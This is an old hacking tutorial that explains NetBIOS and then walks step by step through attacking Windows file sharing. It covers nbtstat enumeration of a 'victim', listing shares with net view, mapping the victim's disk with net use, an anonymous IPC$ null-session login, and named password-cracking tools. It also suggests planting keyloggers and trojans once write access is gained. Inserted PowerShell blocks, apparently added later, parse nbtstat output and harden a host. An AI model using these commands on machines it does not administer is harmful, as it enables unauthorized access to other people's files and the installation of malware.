<<-- NetBIOS Attack -->>
Part 1
NetBIOS, which stands for "Network Basic Input Output System", allows nodes on a network to send data to each other over a LAN (Local Area Network). It was released by IBM, and Microsoft later adapted it for its own operating system. Modern OSes ship with the NetBIOS Extended User Interface (NetBEUI), but in order to communicate over a WAN (Wide Area Network) you need to use another protocol, such as TCP (Transmission Control Protocol), rather than NetBIOS.
When you make a request to NetBIOS it takes the form of a Network Control Block (NCB), which specifies a message location and the name of the destination.
NetBIOS makes use of the session and transport layers of the OSI (Open Systems Interconnection) model, though it does not provide a standard frame format for data transmission; NetBEUI takes care of encapsulating the data in a standard frame.
NetBIOS communicates in one of two modes: session or datagram. Session mode lets two nodes on the network talk to each other, thereby creating a "session". It can handle bulky messages and takes care of error detection and recovery. Datagram mode, on the other hand, is "connectionless": it uses UDP, and the data transmitted is not guaranteed to arrive at its destination. Messages must therefore be smaller and are sent independently, and error detection and recovery are left to the application. Datagram mode can also broadcast a message to all the machines connected to the LAN.
Part 2
In this tutorial we will be demonstrating one of the easiest ways hackers manage to gain access to your network infrastructure within minutes. I certainly condemn the acts of a hacker, but I am not opposed to an ethical hacker, one who works with the network administrators and makes them aware that they need to patch their systems for leaks and holes.
If you skimmed through Part 1, I strongly recommend that you go back and read it first to get an idea of what NetBIOS really is. I'll continue extending my explanation in this tutorial and I'll introduce an exploit found in the Windows operating system itself, called the "NetBIOS Attack".
NetBIOS was developed by IBM and Sytek as an API (Application Programming Interface) for clients to share information over a LAN (Local Area Network). It commonly works on Windows 9x platforms such as Windows 98, Windows Me, Windows NT, etc.
Having said that, I have no doubt that you must have clicked on "Network Neighborhood" in order to access other nodes on the network. Do you know what happens when you click on it? Your machine requests the names of the computers connected to the network (LAN) using NetBIOS. So what NetBIOS actually does is give out the names and general information of the computers attached to the network. Such information includes:
Name of the Machine
User Name
Domain
Host Name
This is the most vital information we need. Like any other service, NetBIOS runs on a specific port number; in this case it is either 139 or 445.
Using the NBTSTAT Command
This is the command found in MS-DOS used to communicate with NetBIOS. Once you have launched the command prompt you will see this:
c:\ or c:\windows>
If something else is written after the C:\ don't worry, just keep reading; it will still work. We want to get information about the victim's machine, so we type the command:
c:\windows>nbtstat -a 255.255.255.255
255.255.255.255 is used here only as an example address. You end up with the following information about the victim's machine:
NetBIOS Remote Machine Name Table
Name          Number  Type  Usage
==========================================================================
workgroup     00      G     Domain Name
my_computer   03      U     Messenger Service
myusername    03      U     Messenger Service
MAC Address = 00-02-44-14-23-E6
We have the MAC address; we may make use of that piece of information later on. It's written as a string of hexadecimal numbers.
Now we have the NetBIOS names and the type of service each one is running.
Types of Attacks
There are two types of attacks that can be launched using NetBIOS:
1. Reading/writing to a remote machine
2. Denial of Service (DoS) attack
To search for a victim we need a port scanner, which will tell us what type of operating system and services the victim is currently running. A port scanner scans a given range to track down open ports on the system. A well-known port scanner is "Orge", which will give out the NetBIOS names of the remote machine.
You can also download an application called "nbtscan" from http://www.unixwiz.net/tools/nbtscan.html, and it will provide you with a list of open NetBIOS name servers.
Believe it or not, as already stated, NetBIOS is one of the easiest hacks there is. Though it depends on luck: the victim needs to have "File and Printer Sharing" enabled in order for you to get at his or her machine.
Now let's suppose that we type:
c:\windows>nbtstat -a 255.255.255.255
and the following table turns up:
NetBIOS Remote Machine Name Table
Name               Type     Status
-------------------------------------------------
user        <00>   UNIQUE   Registered
workgroup   <00>   GROUP    Registered
user        <03>   UNIQUE   Registered
user        <20>   UNIQUE   Registered
MAC Address = 00-02-44-14-23-E6
Bingo! The number <20> indicates that the victim has enabled the "File and Printer Sharing" feature.
Note: If <20> doesn't show up, we can conclude that "File and Printer Sharing" is not enabled. If instead you are prompted with an error message saying "Host Not Found", then port 139 is closed, blocked by some type of firewall, or the IP address doesn't exist.
We are nearly over the hill. Now we need to know what files, folders and printers are being shared on the LAN. For that we use the following command:
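As an added example (not part of the original post), here is a PowerShell function that decodes the name table printed by "nbtstat -A <host>", so an administrator can audit the output from machines they manage and spot the <20> entry the tutorial keys on. The nbtstat text is a constructed sample in the layout of the table above, and the suffix meanings come from the standard NetBIOS suffix list.

```powershell
# Added example, not from the original post: decode the name table printed
# by "nbtstat -A <host>" so an administrator can audit their own machines
# for the <20> (File Server service) entry. $sample is a constructed capture
# in the layout shown in the tutorial, not real output from any host.
$sample = @"
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    USER           <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    USER           <03>  UNIQUE      Registered
    USER           <20>  UNIQUE      Registered

    MAC Address = 00-02-44-14-23-E6
"@

# Common NetBIOS suffix codes (a subset of the standard suffix list)
$SuffixMeaning = @{
    '00' = 'Workstation service / workgroup or domain name'
    '03' = 'Messenger service (machine or logged-on user name)'
    '20' = 'File Server service: File and Printer Sharing is enabled'
    '1B' = 'Domain Master Browser'
    '1D' = 'Master Browser'
}

function ConvertFrom-NbtstatTable {
    param([Parameter(Mandatory)][string]$Text)
    $rows = foreach ($line in ($Text -split "`r?`n")) {
        # Match rows such as "    USER   <20>  UNIQUE   Registered"
        if ($line -match '^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)') {
            $suffix  = $Matches[2].ToUpper()
            $meaning = 'Unknown suffix'
            if ($SuffixMeaning.ContainsKey($suffix)) { $meaning = $SuffixMeaning[$suffix] }
            [pscustomobject]@{ Name = $Matches[1]; Suffix = $suffix; Type = $Matches[3]
                               Status = $Matches[4]; Meaning = $meaning }
        }
    }
    $mac = $null
    if ($Text -match 'MAC Address\s*=\s*([0-9A-Fa-f]{2}(-[0-9A-Fa-f]{2}){5})') { $mac = $Matches[1] }
    [pscustomobject]@{
        Entries        = @($rows)
        MacAddress     = $mac
        SharingEnabled = [bool]@($rows | Where-Object { $_.Suffix -eq '20' })   # true when <20> is listed
    }
}

$result = ConvertFrom-NbtstatTable -Text $sample
$result.Entries | Format-Table -AutoSize
if ($result.SharingEnabled) {
    Write-Warning "Suffix <20> present: File and Printer Sharing is reachable on $($result.MacAddress)"
}
```

On a host you administer, feed the function the real text with `ConvertFrom-NbtstatTable -Text ((nbtstat -A <host>) -join "`n")`; a <20> entry on a machine that is not meant to serve shares is a finding to fix.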
c:\windows>net view \\255.255.255.255
Let's suppose we get the following output:
Shared resources at \\255.255.255.255
ComputerNameGoesHere
Share name   Type   Used as   Comment
-----------------------------------------------
CDISK        Disk
The command completed successfully.
Here we know that the shared resource is a disk, assigned the share name CDISK. To get further information we'll type:
Shared resources at \\255.255.255.255
ComputerNameGoesHere
Share name   Type    Used as   Comment
-----------------------------------------------
HP-15        Print
Here we know that the victim has a printer installed with the share name HP-15.
Let's say that the victim has a shared printer. That's already a huge advantage, since we can print remotely without him noticing.
Now that we are equipped with the victim's IP address, have confirmed that File and Printer Sharing is enabled, and know that the victim's shared disk is named CDISK, the last step is to connect to it and look for more files and folders.
Therefore, we introduce the NET command.
Let's say that we want our new drive letter to be X:. We can connect using this command:
C:\windows>net use x: \\255.255.255.255\CDISK
Note: X may be replaced with any other letter.
If everything goes well you will finally receive the message: "The command completed successfully".
Now all you have to do is double-click on "My Computer" and voila!
All files and folders are accessible.
You can alter the files only if you have the necessary permissions. You have just created a new drive X: on your computer, and you can enter the victim's hard drive any time you like, as long as you're still remotely connected to it.
<<-- Further Explanation -->>
There are cases where you try to connect to the victim's computer and are asked for a password. It's commonly set to "Administrator", though most of the time they change it to something else. There is a program which will do all the dirty work for you, called "PQWAK". All it requires is the IP address and the share name of the host, and it will decrypt the password hash within seconds.
Note: Passwords will only be cracked if the victim is running one of the following OSes:
Windows 95
Windows 98
Windows Me
<<-- The IPC$ Hidden Share Hack found in Windows NT, 2000, XP -->>
This is used in case the password isn't crackable. It gains access to the victim's machine just by typing a single command, which logs in as a guest and does not act as a password cracker itself. So, it's:
c:\windows>net use x: \\255.255.255.255\ipc$ "" /user:""
This will not actually gain the same access rights as the method explained above, but it will yield useful information such as shared drives, user names, users that have never logged in, etc. Two tools that use this method are "Internet Periscope" and "enum", which is basically a command-line tool.
If you're lucky enough to have write permissions you can place files on the hard drive, such as keyloggers, trojans, etc., which will later open further holes in the OS if the victim is lame enough to double-click the executable files and start the service.
<<-- How to Protect yourself from such an attack -->>
Visit the Microsoft Update page and let the updates install automatically:
http://windowsupdate.microsoft.com
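Updates alone do not close the doors this tutorial walks through, so here is an added PowerShell example (not from the original post) that removes the exposure on a current Windows host: it turns off NetBIOS over TCP/IP, blocks inbound 139/445, refuses the anonymous IPC$ session, retires SMB1 and lists the shares that remain. It assumes an elevated PowerShell on a supported Windows version with the NetSecurity and SmbShare modules; the firewall rule name is a placeholder of our choosing.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell
# on a supported Windows version (NetSecurity and SmbShare modules present).

# 1. Disable NetBIOS over TCP/IP on every IP-enabled adapter
#    (TcpipNetbiosOptions: 0 = use DHCP setting, 1 = enable, 2 = disable)
Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
    ForEach-Object {
        Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = 2 }
    }

# 2. Block inbound NetBIOS session (139) and SMB (445) on all profiles.
#    A host that must serve shares should scope -RemoteAddress to the trusted subnet instead.
New-NetFirewallRule -DisplayName 'Block inbound NetBIOS/SMB (placeholder name)' `
    -Direction Inbound -Protocol TCP -LocalPort 139,445 -Action Block -Profile Any

# 3. Refuse anonymous (null-session) enumeration of shares and accounts over IPC$
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
Set-ItemProperty -Path $lsa -Name RestrictAnonymous    -Value 1 -Type DWord
Set-ItemProperty -Path $lsa -Name RestrictAnonymousSAM -Value 1 -Type DWord

# 4. Retire SMB1 and list every non-administrative share so each one can be justified
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Get-SmbShare | Where-Object { -not $_.Special } | Select-Object Name, Path, ScopeName
```

Verify from another machine with `Test-NetConnection -ComputerName <this host> -Port 445`; a TcpTestSucceeded of False confirms the block, and a fresh `nbtstat -A` should now report "Host not found".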
That's all for now, until then,
DarkSolo